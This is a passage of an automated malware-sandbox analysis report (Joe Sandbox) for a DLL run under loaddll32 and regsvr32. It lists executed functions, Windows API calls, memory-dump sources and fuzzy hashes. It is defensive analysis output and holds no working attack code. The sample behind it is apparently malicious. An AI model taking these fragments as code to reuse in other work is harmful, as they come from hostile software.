				return E0087648A(_a4, _v20, _v12, _v16, E008828EB(), _v28);
			}

0x0086c5de
0x0086c5e4
0x0086c5eb
0x0086c5f2
0x0086c5f9
0x0086c600
0x0086c607
0x0086c60b
0x0086c612
0x0086c619
0x0086c61d
0x0086c629
0x0086c62e
0x0086c633
0x0086c63a
0x0086c641
0x0086c648
0x0086c64f
0x0086c656
0x0086c660
0x0086c663
0x0086c666
0x0086c66d
0x0086c674
0x0086c67b
0x0086c682
0x0086c686
0x0086c68a
0x0086c6b7

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction ID: 94303e031998101f456856404cbdd9bc0f15286840296d416fa0cccaf895b76b
Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
Instruction Fuzzy Hash: 6921FEB5D0020DEBDB08DFE5C98A4EEBBB1BB54718F208088D525B6264D7B54B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 0086F7F7, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0086F7F7() {

				return  *[fs:0x30];
			}

0x0086f7fd

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exe PID: 6536 Parent PID: 6532 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.9%
Total number of Nodes:	450
Total number of Limit Nodes:	17

Executed Functions

Function 10002D40, Relevance: 22.8, APIs: 15, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1

SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
GlobalHandle.KERNEL32(02F748A8), ref: 1002AE1E
GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 1002AE41
GlobalHandle.KERNEL32(02F748A8), ref: 1002AE53
GlobalLock.KERNEL32 ref: 1002AE5A
LeaveCriticalSection.KERNEL32(?,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE63
GlobalLock.KERNEL32 ref: 1002AE6F
_memset.LIBCMT ref: 1002AE89
LeaveCriticalSection.KERNEL32(?), ref: 1002AEB7

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction ID: 1a22abfe9f33a297b41a0f192d06fc5d98366496c497f4e189800256e1e6bccf
Opcode Fuzzy Hash: 0164f1c6eb9680f14c75084477ec16f681797b22eeba17cddfee44694ed90e92
Instruction Fuzzy Hash: 1E31AD71600715AFEB21CF68DD89A1BBBF9FF46301B42892DE55AD3661DB30F8818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002E577, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002E595

Part of subcall function 10035865: __mtinitlocknum.LIBCMT ref: 1003587B
Part of subcall function 10035865: __amsg_exit.LIBCMT ref: 10035887
Part of subcall function 10035865: EnterCriticalSection.KERNEL32(00000000,00000000,?,1003481B,0000000D,1004E828,00000008,10034912,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 1003588F

___sbh_find_block.LIBCMT ref: 1002E5A0
___sbh_free_block.LIBCMT ref: 1002E5AF
RtlFreeHeap.NTDLL(00000000,00000000,1004E648,0000000C,10034761,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 1002E5DF
GetLastError.KERNEL32(?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000,?,1003481B,0000000D), ref: 1002E5F0

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction ID: 15e9110145b1e9c1bde58837c3f2254f90dacbefcca8cfa7097211139088966e
Opcode Fuzzy Hash: 4be1625d71f223fd5a529c098bfd6286ab20592f98f3d388c1b792f7bfa5bc77
Instruction Fuzzy Hash: E001A7358567669EEB21DBB1AC0574D3BE4FF01796F900415F404AA4D1DF34AD40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100036A0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 937
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100036BB

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Strings

+';, xrefs: 100036A0

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID: +';
API String ID: 501242067-2694261586
Opcode ID: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction ID: 8c5fde967666ed0afc5dc7c826d0591e9b318715144b3c37a2536eafdc0580d3
Opcode Fuzzy Hash: 0b326109276fce54ba6433786671c084a7be121183821a19a2d99cb653a252e6
Instruction Fuzzy Hash: 8FB21B369120218FE70ADFACDED5F257BA6F794608747B21FC4018737ADE306464CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 10003440, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9

_malloc.LIBCMT ref: 100034B7

Strings

+';, xrefs: 10003440

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _malloc
String ID: +';
API String ID: 1579825452-2694261586
Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10002690, Relevance: 3.1, APIs: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 100024D0, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10024BD0, Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 10024BD7

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66

Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
String ID:
API String ID: 1104862767-0
Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15

Uniqueness

Uniqueness Score: -1.00%

Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memcpy_s.LIBCMT ref: 1001FBE6

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 1002B0C2

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 1000800B

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100236ED

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15

Uniqueness

Uniqueness Score: -1.00%

Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 1003C809
___getlocaleinfo.LIBCMT ref: 1003C81E
___getlocaleinfo.LIBCMT ref: 1003C833
___getlocaleinfo.LIBCMT ref: 1003C848
___getlocaleinfo.LIBCMT ref: 1003C860
___getlocaleinfo.LIBCMT ref: 1003C875
___getlocaleinfo.LIBCMT ref: 1003C887
___getlocaleinfo.LIBCMT ref: 1003C89C
___getlocaleinfo.LIBCMT ref: 1003C8B4
___getlocaleinfo.LIBCMT ref: 1003C8C9

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
